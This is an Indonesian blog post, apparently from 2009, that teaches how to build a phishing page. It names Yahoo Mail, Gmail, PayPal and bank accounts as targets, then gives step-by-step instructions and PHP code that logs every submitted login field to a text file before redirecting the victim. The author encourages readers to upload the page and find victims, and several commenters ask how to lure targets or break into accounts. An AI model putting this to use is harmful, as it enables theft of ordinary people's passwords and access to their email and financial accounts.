#menu li { position:static; }

09 Juni 2009

Membuat halaman fakelogin

Ha..ha, saya sepertinya sudah gila menerbitkan artikel-artikel yang seharusnya tidak layak dipublikasikan. Tapi tidak mengapalah, saya hanya menyalurkan ide yang tidak bisa selamanya saya simpan dalam kepala penuh dosa ini. Ha3x... Teknik pencurian password menggunakan fake login atau lebih dikenal dengan nama phising telah saya bahas sebelumnya disini. Begitu juga dengan halaman fakelogin untuk facebook juga dapat dilihat disini. Nah bagi yang mau bereksperimen sendiri dengan berbagai halaman login palsu misalnya yahoo mail, gmail, paypal, ebay, atau bahkan account sebuah Bank? silakan dicoba disini ha3x....



Langkah pertama yang dilakukan adalah masuk ke halaman login situs yang menjadi target misalnya yahoo mail. Save Page As (default untuk firefox) atau simpan seluruh halaman secara komplit pada sebuah folder terpisah (misalkan beri nama folder mail). Kamu akan mendapatkan satu buah file html dan sebuah folder yang berisi image dan file lainya. Nah selanjutnya ganti nama file HTML menjadi index.html

Masih pada folder yang sama, buat sebuah file baru dan beri nama serial.txt. Kemudian buah sebuah file php dengan code script di bawah ini. Kemudian Simpan dengan nama login.php. Pastikan kode warna merah diganti dengan nama domain tempat penyimpanan file fake login tersebut.

<?php
Header("Location: http://nama-domain.com");
$handle = fopen("serial.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


Langkah berikutnya adalah buka file index.html yang tadi menggunakan text editor. Kemudian cari code yang mengarahkan Form login biasanya diindikasikan dengan nama <form></form> Kemudian ganti action ke file login.php yang telah dibuat dan ganti method menjadi GET. Kira-kira hasilnya menjadi seperti ini:

<form action ="http://nama-domain.com" method="get"></form>

Jika sudah, upload semua file tersebut kedalam hosting kamu sendiri dan mulailah mencari target phising sebagai korban pertama anda.. ha3x... Selamat Mencoba

11 Komentar:

abd_kholiq on 12 Juni, 2009 11:19 mengatakan...

Mudah2an tidak di salah gunakan.

Sucipto, S.Pd on 16 Juni, 2009 16:24 mengatakan...

wah ini tindakan melanggar hukum atau bunuh diri ya? belajar web hacking nih ati2 loh entar kena bulunya

Anonim mengatakan...

Mas thank's banget buat tutorialnya, sangat membantu...
uhm...
mas, saya mau tanya nih, saya pernah liat tutorial "DESKTOP PHISHING". mas bisa kasih tutorialnya gak? thx...
oh iya mas nih aq kasih blognya http://lankanath.blogspot.com/2009/06/desktop-phishing-by-zero-thunder.html

semoga bisa membantu. oh iya mas, ntr publish ya tutorialnya... thank's before

by: crackingindonesia@yahoo.com

Anonim mengatakan...

mas kalo udah bisa jangan lupa di publish lho...
kwkwkwwk....

lam knl y mas....

by: crackingindonesia@yahoo.com

Anonim mengatakan...

Mas gimana ya cara mancing korban?

Anonim mengatakan...

mas bisa gak ngebuka akun yahoo yang lupa pass dan pertanyaan rahasianya,,,,,?????
balas ke : imoekm@yahoo.co.id

Raini Munti on 25 Juni, 2011 20:31 mengatakan...

gan ane beli dimana software bwt ngehack twitter?

cheat point blank on 11 Maret, 2012 13:31 mengatakan...

cara meng upload ke web hosting nya gimana ?
maklum masih newbie

cheat point blank on 11 Maret, 2012 13:43 mengatakan...

tolong bantu gan

Go Widodo on 28 Februari, 2015 23:20 mengatakan...

thanks gan. nambah ilmu :)

Abdullah Gymnastiar.s on 16 Desember, 2015 17:29 mengatakan...

Maksudnya upload ke hosting sendiri gmn maz?

Poskan Komentar

Jangan lupa tambahkan komentar anda pada artikel ini

 

Tentang saya

MUCHLISIN adalah pengajar/praktisi elektronika dan komputer di kota Bengkulu. Blog Idecapung didedikasikan sebagai media sharing informasi, edukasi dan hobi.
RSS Link Twitter Link Facebook Link RSS Email

Free Page Rank Tool TopOfBlogs Computers Blogs

Chatbox

Teman Facebook

Pengikut